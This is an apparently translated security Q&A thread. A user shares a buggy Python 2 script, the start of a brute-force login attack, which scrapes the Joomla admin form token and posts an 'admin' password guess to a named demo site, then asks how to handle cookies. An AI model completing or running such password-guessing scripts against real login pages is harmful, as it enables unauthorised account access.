Attacco forza bruta [chiuso]

1

Sto cercando di creare un semplice script (attacco brute force) su Joomla per provare se funziona.

#! /usr/bin/python
import re #regex
import urllib
import urllib2
x = urllib2.urlopen("http://www.demosite.center/joomla/administrator/index.php") #GET Request
find_in   = x.read()
cookies=x.headers['set-cookie'] #to get the cookies from get request 
the_lhash = re.findall(r"([a-fA-F\d]{32})", find_in) #it'll be list 
the_hash  = the_lhash[0] #str 
print the_hash # the hash from get req
password="demo123"
print password,
url = 'http://demo.opensourcecms.com/joomla/administrator/index.php' # to know the values type any password to know the cookies 
values = {"username" : "admin",
          "passwd" : password,
          "lang" : "" ,
          "option" : "com_login",
          "task" : "login",
          "return" : "aW5kZXgucGhw",
      the_hash : "1"  } # request with the hash 

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
result = response.read() 
cookies=response.headers['set-cookie'] #to get the last cookies from post req in this variable
opener = urllib2.build_opener() # send the cookies
opener.addheaders.append(('Cookie', cookies)) # send the cookies
f = opener.open("http://demo.opensourcecms.com/joomla/administrator/index.php")
if cookies.find("wordpress_logged_i")!=-1:
  print the_hash +"\n"
  print " -> success\n",
else:
  print the_hash 
  print " -> fail\n",

Poi ho cercato su Google come inviare i cookie all'interno della stessa richiesta POST e ho trovato:

opener = urllib2.build_opener() # send the cookies
opener.addheaders.append(('Cookie', cookies)) # send the cookies
f = opener.open("http://example")

Ma non so esattamente dove dovrei inserirlo nel mio codice.

Quello che devo fare è inviare la richiesta GET, inserire i cookie dalla richiesta in una variabile, quindi effettuare una richiesta POST con il valore ottenuto dalla richiesta GET.

    
posta smile 01.08.2015 - 00:41
fonte

1 risposta

0

non è chiaro per me qual è la domanda, ma sembra che tu abbia un problema con l'invio e la ricezione del cookie.

Ma penso che dovresti guardare il seguente pacchetto python

link

link

Ma penso che questa sia davvero una domanda di programmazione più di una domanda relativa alla sicurezza

    
risposta data 01.08.2015 - 01:26
fonte

Leggi altre domande sui tag